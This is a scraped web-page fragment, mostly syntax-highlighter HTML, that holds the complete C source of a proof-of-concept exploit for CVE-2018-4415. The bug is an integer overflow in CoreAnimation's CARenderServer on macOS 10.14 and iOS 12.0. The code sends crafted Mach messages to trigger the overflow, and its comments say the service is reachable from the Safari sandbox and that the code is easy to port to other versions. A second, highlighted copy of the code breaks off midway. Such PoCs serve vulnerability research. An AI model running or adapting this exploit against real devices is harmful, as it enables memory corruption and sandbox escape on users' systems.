title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">C<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \/**   *  Brief: Integer overflow in CoreAnimation, CVE-2018-4415   *  Usage:   *    1. clang FunctionIntOverFlow.c -o function_over_flow   *    2. .\/function_over_flow   *   *  Specifically, `CA::Render::InterpolatedFunction::allocate_storage` function in QuartzCore does   *  not do any check for integer overflow in expression |result = (char *)malloc(4 * (v4 + v3));|.   *   *  The bug has been fixed in macOS 10.14.1 and iOS 12.1, since the interfaces and structure of   *  messages are inconsistent between different versions, this PoC may only work on macOS 10.14 and   *  iOS 12.0, but it&#8217;s very easy to replant it to another versions.   *   *  Tips for debugging on macOS: Turn Mac to sleep mode and ssh to the target machine, this may   *  help you concentrate on your work.   *   *  One more: Mach service com.apple.CARenderServer is reacheable from Safari sandbox on both macOS   *  and iOS. com.apple.windowserver.active accurately on macOS versions prior to macOS 10.14.   *\/    #include &lt;dlfcn.h&gt;  #include &lt;mach\/mach.h&gt;  #include &lt;stdio.h&gt;  #include &lt;unistd.h&gt;    static void do_int_overflow() {        mach_port_t p = MACH_PORT_NULL, bs_port = MACH_PORT_NULL;      task_get_bootstrap_port(mach_task_self(), &amp;bs_port);      const char *render_service_name = &#8220;com.apple.CARenderServer&#8221;;      kern_return_t (*bootstrap_look_up)(mach_port_t, const char *, mach_port_t *) =          dlsym(RTLD_DEFAULT, &#8220;bootstrap_look_up&#8221;);      kern_return_t kr = bootstrap_look_up(bs_port, render_service_name, &amp;p);        if (kr != KERN_SUCCESS) {          printf(&#8220;[-] Cannot get service of %s, %s!n&#8221;, render_service_name, mach_error_string(kr));          return;      }        typedef struct quartz_register_client_s quartz_register_client_t;      struct quartz_register_client_s {          mach_msg_header_t header;          uint32_t body;          mach_msg_port_descriptor_t ports[4];          char padding[12];      };        quartz_register_client_t msg_register;      memset(&amp;msg_register, 0, sizeof(msg_register));      msg_register.header.msgh_bits =          MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE) |          MACH_MSGH_BITS_COMPLEX;      msg_register.header.msgh_remote_port = p;      msg_register.header.msgh_local_port = mig_get_reply_port();      msg_register.header.msgh_id = 40202;  \/\/ _XRegisterClient        msg_register.body = 4;      msg_register.ports[0].name = mach_task_self();      msg_register.ports[0].disposition = MACH_MSG_TYPE_COPY_SEND;      msg_register.ports[0].type = MACH_MSG_PORT_DESCRIPTOR;      msg_register.ports[1].name = mach_task_self();      msg_register.ports[1].disposition = MACH_MSG_TYPE_COPY_SEND;      msg_register.ports[1].type = MACH_MSG_PORT_DESCRIPTOR;      msg_register.ports[2].name = mach_task_self();      msg_register.ports[2].disposition = MACH_MSG_TYPE_COPY_SEND;      msg_register.ports[2].type = MACH_MSG_PORT_DESCRIPTOR;      msg_register.ports[3].name = mach_task_self();      msg_register.ports[3].disposition = MACH_MSG_TYPE_COPY_SEND;      msg_register.ports[3].type = MACH_MSG_PORT_DESCRIPTOR;        kr = mach_msg(&amp;msg_register.header, MACH_SEND_MSG | MACH_RCV_MSG,                    sizeof(quartz_register_client_t), sizeof(quartz_register_client_t),                    msg_register.header.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);      if (kr != KERN_SUCCESS) {          printf(&#8220;[-] Send message failed: %sn&#8221;, mach_error_string(kr));          return;      }        mach_port_t context_port = *(uint32_t *)((uint8_t *)&amp;msg_register + 0x1c);      uint32_t conn_id = *(uint32_t *)((uint8_t *)&amp;msg_register + 0x30);        typedef struct quartz_function_int_overflow_s quartz_function_int_overflow_t;      struct quartz_function_int_overflow_s {          mach_msg_header_t header;          char msg_body[0x60];      };        quartz_function_int_overflow_t function_int_overflow_msg = {0};      function_int_overflow_msg.header.msgh_bits =          MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0) | MACH_MSGH_BITS_COMPLEX;      function_int_overflow_msg.header.msgh_remote_port = context_port;      function_int_overflow_msg.header.msgh_id = 40002;        memset(function_int_overflow_msg.msg_body, 0x0, sizeof(function_int_overflow_msg.msg_body));      *(uint32_t *)(function_int_overflow_msg.msg_body + 0) = 0x1;  \/\/ Ports count        \/**       *\t1. One port consumes 12B space       *\t2. This `mach_msg` routine dose not need a port, so set this port to MACH_PORT_NULL(memory       *\t   cleared by memset)       *\/        *(uint32_t *)(function_int_overflow_msg.msg_body + 4 + 12 + 0) = 0xdeadbeef;      *(uint32_t *)(function_int_overflow_msg.msg_body + 4 + 12 + 4) = conn_id;      *(int8_t *)(function_int_overflow_msg.msg_body + 4 + 12 + 16) = 2;      *(uint64_t *)(function_int_overflow_msg.msg_body + 4 + 12 + 16 + 1) = 0xdeadbeefdeadbeef;      *(uint32_t *)(function_int_overflow_msg.msg_body + 4 + 12 + 16 + 9) = 0xffffffff;        *(uint8_t *)(function_int_overflow_msg.msg_body + 4 + 12 + 16 + 13) = 0x12;  \/\/ Decode Function      *(uint8_t *)(function_int_overflow_msg.msg_body + 4 + 12 + 16 + 14) = 0x2;      \/**(uint32_t*)(function_int_overflow_msg.msg_body + 4 + 12 + 16 + 15) = 0xDECAFBAD;*\/      *(uint64_t *)(function_int_overflow_msg.msg_body + 4 + 12 + 16 + 15) = 0x2000000000000000;      *(uint32_t *)(function_int_overflow_msg.msg_body + 4 + 12 + 16 + 23) = 1;      *(uint32_t *)(function_int_overflow_msg.msg_body + 4 + 12 + 16 + 27) = 2;      *(uint8_t *)(function_int_overflow_msg.msg_body + 4 + 12 + 16 + 31) = 1;        kr = mach_msg(&amp;function_int_overflow_msg.header, MACH_SEND_MSG,                    sizeof(function_int_overflow_msg), 0, 0, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);      if (kr != KERN_SUCCESS) {          printf(&#8220;[-] Send message failed: %sn&#8221;, mach_error_string(kr));          return;      }        return;  }    int main() {      do_int_overflow();      return 0;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-96\">96<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-97\">97<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-98\">98<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-99\">99<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-100\">100<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-101\">101<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-102\">102<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-103\">103<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-104\">104<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-105\">105<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-106\">106<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-107\">107<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-108\">108<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-109\">109<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-110\">110<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-111\">111<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-112\">112<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-113\">113<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-114\">114<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-115\">115<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-116\">116<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-117\">117<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-118\">118<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-119\">119<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-120\">120<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-121\">121<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-122\">122<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-123\">123<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-124\">124<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-125\">125<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-126\">126<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-127\">127<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-128\">128<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab3043485934892-129\">129<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab3043485934892-130\">130<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-1\"><span class=\"crayon-c\">\/**<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-2\"><span class=\"crayon-c\"> *&nbsp;&nbsp;Brief: Integer overflow in CoreAnimation, CVE-2018-4415<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-3\"><span class=\"crayon-c\"> *&nbsp;&nbsp;Usage:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-4\"><span class=\"crayon-c\"> *&nbsp;&nbsp;&nbsp;&nbsp;1. clang FunctionIntOverFlow.c -o function_over_flow<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-5\"><span class=\"crayon-c\"> *&nbsp;&nbsp;&nbsp;&nbsp;2. .\/function_over_flow<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-6\"><span class=\"crayon-c\"> *<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-7\"><span class=\"crayon-c\"> *&nbsp;&nbsp;Specifically, `CA::Render::InterpolatedFunction::allocate_storage` function in QuartzCore does<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-8\"><span class=\"crayon-c\"> *&nbsp;&nbsp;not do any check for integer overflow in expression |result = (char *)malloc(4 * (v4 + v3));|.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-9\"><span class=\"crayon-c\"> *<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-10\"><span class=\"crayon-c\"> *&nbsp;&nbsp;The bug has been fixed in macOS 10.14.1 and iOS 12.1, since the interfaces and structure of<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-11\"><span class=\"crayon-c\"> *&nbsp;&nbsp;messages are inconsistent between different versions, this PoC may only work on macOS 10.14 and<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-12\"><span class=\"crayon-c\"> *&nbsp;&nbsp;iOS 12.0, but it&#8217;s very easy to replant it to another versions.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-13\"><span class=\"crayon-c\"> *<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-14\"><span class=\"crayon-c\"> *&nbsp;&nbsp;Tips for debugging on macOS: Turn Mac to sleep mode and ssh to the target machine, this may<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-15\"><span class=\"crayon-c\"> *&nbsp;&nbsp;help you concentrate on your work.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-16\"><span class=\"crayon-c\"> *<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-17\"><span class=\"crayon-c\"> *&nbsp;&nbsp;One more: Mach service com.apple.CARenderServer is reacheable from Safari sandbox on both macOS<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-18\"><span class=\"crayon-c\"> *&nbsp;&nbsp;and iOS. com.apple.windowserver.active accurately on macOS versions prior to macOS 10.14.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-19\"><span class=\"crayon-c\"> *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-20\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-21\"><span class=\"crayon-p\">#include &lt;dlfcn.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-22\"><span class=\"crayon-p\">#include &lt;mach\/mach.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-23\"><span class=\"crayon-p\">#include &lt;stdio.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-24\"><span class=\"crayon-p\">#include &lt;unistd.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-25\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-26\"><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">do_int_overflow<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-27\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">mach_port<\/span><span class=\"crayon-sy\">_<\/span>t<span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_PORT_NULL<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bs_port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_PORT_NULL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">task_get_bootstrap_port<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">mach_task_self<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">bs_port<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">const<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">render_service_name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;com.apple.CARenderServer&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">kern_return_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">bootstrap_look_up<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">mach_port_t<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">const<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">mach_port_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">dlsym<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">RTLD_DEFAULT<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;bootstrap_look_up&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">kern_return_t <\/span><span class=\"crayon-v\">kr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bootstrap_look_up<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">bs_port<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">render_service_name<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-34\">&nbsp;<\/div>\n<div class=\"crayon-line\" 